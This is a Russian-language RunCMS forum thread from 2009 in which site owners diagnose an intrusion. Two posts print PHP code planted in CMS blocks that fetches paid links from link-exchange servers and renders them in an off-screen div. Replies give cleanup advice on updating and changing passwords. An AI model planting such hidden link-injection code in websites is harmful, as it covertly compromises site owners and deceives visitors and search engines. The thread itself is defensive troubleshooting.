Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
disshaman вне форума disshaman
Участник


| Цитировать Старый #1 06-02-2009, 23:50

Анализировал сайт и увидел парочку лишних ссылок. Ковырнул блоки:
вот в первом дописано после десятков пустых строк (действует - не сразу понял, что код внизу гдето)
Код:
$uri=$_SERVER['REQUEST_URI'];
if (strlen(session_id())>0)
{
$session=session_name().'='.session_id();
$uri=str_replace(array('?'.$session,'&'.$session),'',$uri);
}
$s=file_get_contents('http://db.linkfeed.ru/edcb0c66a417384d72a7ff329b610cca54c343e9/мой сайт.ru');
if (empty($s)) {
echo '.';} else{
$text='';
$s=@unserialize($s);
if ($s and isset($s[$uri]))
$text=implode(' ',$s[$uri]);
echo "<div style=\"position:absolute;top:-250px;\">";
echo $text;
echo "</div>";
echo "<!--3a9f6b4e-->";
Предложения? Где дырка? Роня 1.5.3

Последний раз редактировалось disshaman, 06-03-2009 в 22:00

  Сообщения: 159 c 12.05.2007 | Репутация: 5
Michael-XIII вне форума Michael-XIII
Стар я для всего этого

Аватар для Michael-XIII

| Цитировать Старый #2 06-03-2009, 11:29

До 1.6.1 дырок более чем достаточно - обновляйтесь. Не говоря уже о простом взломе FTP

Если конечно кое-кто по не поставил Linkfeed и забыл

Вариант - написать в их суппорт и затребовать аккаунт, на который деньга идет


"А почему в RunCMS глючит ... ?"
"Глупые винят других. Умные – себя. А мудрые идут вперед". (С)
Посетить домашнюю страницу Michael-XIII
  Сообщения: 1,313 c 18.07.2005 | Репутация: 93
ДядяМиша вне форума ДядяМиша
Младший участник


| Цитировать Старый #3 09-04-2009, 20:53

А как быть с роней 1.6.2?
сегодня вылезла похожая хрень только на сапу...
код из блока:

$uri=$_SERVER['REQUEST_URI'];
if (strlen(session_id())>0)
{
$session=session_name().'='.session_id();
$uri=str_replace(array('?'.$session,'&'.$session), '',$uri);
}
$s=file_get_contents('http://dispenser-01.sape.ru/code.php?user=0dee0f950f1ca908a205c0dc803b29b4&hos t=сайт.ru');

if (empty($s)) {
echo '.';} else{
$text='';
$s=@unserialize($s);
if ($s and isset($s[$uri]))
$text=implode(' ',$s[$uri]);

echo "<div style=\"position:absolute;top:-250px;\">";
echo $text;
echo "</div>";

}

Последний раз редактировалось ДядяМиша, 09-04-2009 в 20:56

  Сообщения: 77 c 01.05.2008 | Репутация: 5
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #4 09-04-2009, 21:54

меняй для начала все пароли


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
ДядяМиша вне форума ДядяМиша
Младший участник


| Цитировать Старый #5 09-04-2009, 22:26

Zormax

Первым делом сменил, сейчас смотрю вылезут или нет опять

  Сообщения: 77 c 01.05.2008 | Репутация: 5
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #6 09-04-2009, 23:45

ДядяМиша фтп клиент какой? тотал?


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
AlexLeonov вне форума AlexLeonov
Arbeit macht Frei

Аватар для AlexLeonov

| Цитировать Старый #7 09-04-2009, 23:49

У Юриста недавно такую бяку чистил.


Ronny CMS? Yes!
Посетить домашнюю страницу AlexLeonov
  Сообщения: 1,243 c 23.06.2004 | Репутация: 108
ДядяМиша вне форума ДядяМиша
Младший участник


| Цитировать Старый #8 09-05-2009, 10:05

Zormax

фтп клиент - SmartFTP
проверил, изменений в файлах за последние дни не было.

AlexLeonov
кроме как удалить код и сменить пароль, делали еще что-нибудь?

  Сообщения: 77 c 01.05.2008 | Репутация: 5
AlexLeonov вне форума AlexLeonov
Arbeit macht Frei

Аватар для AlexLeonov

| Цитировать Старый #9 09-07-2009, 10:44

Цитата:
Сообщение от ДядяМиша Посмотреть сообщение
кроме как удалить код и сменить пароль, делали еще что-нибудь?
Нет, не разбирался.


Ronny CMS? Yes!
Посетить домашнюю страницу AlexLeonov
  Сообщения: 1,243 c 23.06.2004 | Репутация: 108
ДядяМиша вне форума ДядяМиша
Младший участник


| Цитировать Старый #10 09-07-2009, 12:19

После смены пароля - все нормально.
Логинелся в баре с чужого ноута, видно с него и стянули пароль от админки. В общем сам виноват, будет урок на будующее

  Сообщения: 77 c 01.05.2008 | Репутация: 5
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2024, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 78.13 Kb. compressed to 70.98 Kb. by saving 7.16 Kb. (9.16%)
Page generated in 0.07277 seconds with 12 queries